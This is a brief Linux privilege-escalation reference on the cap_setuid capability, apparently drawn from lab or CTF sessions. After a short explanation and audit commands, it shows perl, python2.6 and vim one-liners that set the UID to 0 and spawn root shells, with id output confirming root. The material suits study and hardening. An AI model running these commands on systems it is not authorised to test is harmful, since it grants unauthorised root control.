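Example: perl
A binary with cap_setuid+ep may change its own UID, so granting it to a general-purpose interpreter is equivalent to making that interpreter setuid-root; in the sessions below `id` reports uid=0(root) while the gid remains a non-root group. To audit a host, list file capabilities with `getcap -r / 2>/dev/null` and clear any that are not needed with `setcap -r <file>`.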
hatter@wonderland:~$ getcap /usr/bin/perl
/usr/bin/perl = cap_setuid+ep
$ ./perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
hatter@wonderland:~$ /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
root@wonderland:~# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
root@wonderland:~#
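Example: python2.6 (the output of the getcap scan is not shown in this capture; presumably it listed /usr/bin/python2.6 with cap_setuid+ep, as in the other examples)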
TCM@debian:~$ getcap -r / 2>/dev/null
TCM@debian:~$ /usr/bin/python2.6 -c 'import os;os.setuid(0);os.system("/bin/bash")'
root@debian:~# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
root@debian:~#
Example: vim.basic
leonard@undiscovered:~$ getcap -r /usr/bin/vim.basic
/usr/bin/vim.basic = cap_setuid+ep
leonard@undiscovered:~$ /usr/bin/vim.basic -c 'py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
^[[2;2R# id
sh: 1: ot found
sh: 1: 2Rid: not found
# id
uid=0(root) gid=1002(leonard) groups=1002(leonard),3004(developer)
#
References
Linux Privilege Escalation using Capabilities
Using POSIX Capabilities | THE URBAN PENGUIN